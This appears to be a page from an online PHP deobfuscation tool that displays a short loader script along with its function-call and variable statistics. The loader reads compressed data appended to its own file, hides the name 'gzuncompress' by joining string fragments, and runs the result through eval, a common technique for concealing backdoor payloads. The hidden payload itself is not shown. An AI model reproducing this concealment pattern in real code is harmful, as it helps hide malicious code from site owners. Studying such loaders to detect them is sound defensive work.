Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $d = substr(file_get_contents( __FILE__ ), -36029); $d = str_replace('seftphgzxv',..

Decoded Output download

<?php 
$d = substr(file_get_contents( __FILE__ ), -36029); 
$d = str_replace('seftphgzxv', "<", $d); 
$d = str_replace('mldipenrta', ">", $d); 
$g = 'g'.'z'.'un'.'compr'.'e'.'ss'; 
eval($g($d)); 
exit; 
?>

Did this file decode correctly?

Original Code

<?php
$d = substr(file_get_contents( __FILE__ ), -36029);
$d = str_replace('seftphgzxv', "<", $d);
$d = str_replace('mldipenrta', ">", $d);
$g = 'g'.'z'.'un'.'compr'.'e'.'ss';
eval($g($d));
exit;
?>

Function Calls

substr 1
str_replace 2
gzuncompress 1
file_get_contents 1

Variables

$d
$g gzuncompress

Stats

MD5 d63d11984bc79706f7ec599287b70a36
Eval Count 0
Decode Time 168 ms